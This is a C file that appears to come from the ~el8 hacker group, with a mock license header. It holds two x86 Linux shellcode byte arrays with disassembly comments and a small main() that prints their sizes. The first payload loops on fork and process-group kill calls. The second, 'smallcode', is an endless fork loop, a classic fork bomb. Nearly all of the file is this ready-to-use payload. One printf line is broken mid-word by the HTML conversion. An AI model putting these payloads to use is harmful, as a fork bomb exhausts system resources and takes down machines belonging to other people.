/***********************************************
 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
 ***********************************************/
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */

#include <stdio.h>

/*
 *  ~el8 shellcode !!!!!!!
 *
 */

unsigned char shellcode[] =
{
        0x31, 0xc9,             /* xorl   %ecx,%ecx */
        0x41,                   /* incl   %ecx */
        0x41,                   /* incl   %ecx */
        0x31, 0xc0,             /* xorl   %eax,%eax */
        0xb0, 0x02,             /* movb   $0x2,%al */
        0xcd, 0x80,             /* int    $0x80 */
        0xb0, 0x25,             /* movb   $0x25,%al */
        0x31, 0xdb,             /* xorl   %ebx,%ebx */
        0x89, 0xd9,             /* movl   %ebx,%ecx */
        0xb1, 0x11,             /* movb   $0x11,%cl */
        0xcd, 0x80,             /* int    $0x80 */
        0xe2, 0xee,             /* loop   4  */
        0x55,                   /* pushl  %ebp */
        0x89, 0xe5,             /* movl   %esp,%ebp */
        0x53,                   /* pushl  %ebx */
        0x31, 0xc0,             /* xorl   %eax,%eax */
        0x31, 0xc9,             /* xorl   %ecx,%ecx */
        0x41,                   /* incl   %ecx */
        0x41,                   /* incl   %ecx */
        0xb0, 0xa2,             /* movb   $0xa2,%al */
        0x89, 0x4d, 0xf0,       /* movl   %ecx,0xfffffff0(%ebp) */
        0x31, 0xc9,             /* xorl   %ecx,%ecx */
        0x89, 0x4d, 0xf4,       /* movl   %ecx,0xfffffff4(%ebp) */
        0x89, 0x4d, 0xf8,       /* movl   %ecx,0xfffffff8(%ebp) */
        0x89, 0x4d, 0xfc,       /* movl   %ecx,0xfffffffc(%ebp) */
        0x8d, 0x5d, 0xf0,       /* leal   0xfffffff0(%ebp),%ebx */
        0x8d, 0x4d, 0xf8,       /* leal   0xfffffff8(%ebp),%ecx */
        0xcd, 0x80,             /* int    $0x80 */
        0x31, 0xc9,             /* xorl   %ecx,%ecx */
        0x41,                   /* incl   %ecx */
        0x89, 0xcb,             /* movl   %ecx,%ebx */
        0x89, 0xc8,             /* movl   %ecx,%eax */
        0xcd, 0x80,             /* int    $0x80 */
        0x00
};
unsigned char smallcode[] =
/* a _much_ smaller version (no exit().. or exit for that matter :-) */
{
        0x31,   0xC0,           /* xorl %eax, %eax              */
        0xB0,   0x02,           /* movb $2,%al                  */
        0xCD,   0x80,           /* int  $0x80                   */
        0xEB,   0xF8,           /* jmp  baq_and_touch_yourself  */
        0x00                    /* add a null byte for flavor   */
};
int main(void *a,void **b)
{
        printf("1(%i,%Zi 0x%Zx)\n",strlen(shellcode),sizeof(shellcode),sizeof(s
hellcode));
        printf("2(%i,%Zi 0x%Zx)\n",strlen(smallcode),sizeof(smallcode),sizeof(s
mallcode));
        return (0);
}


syntax highlighted by Code2HTML, v. 0.9.1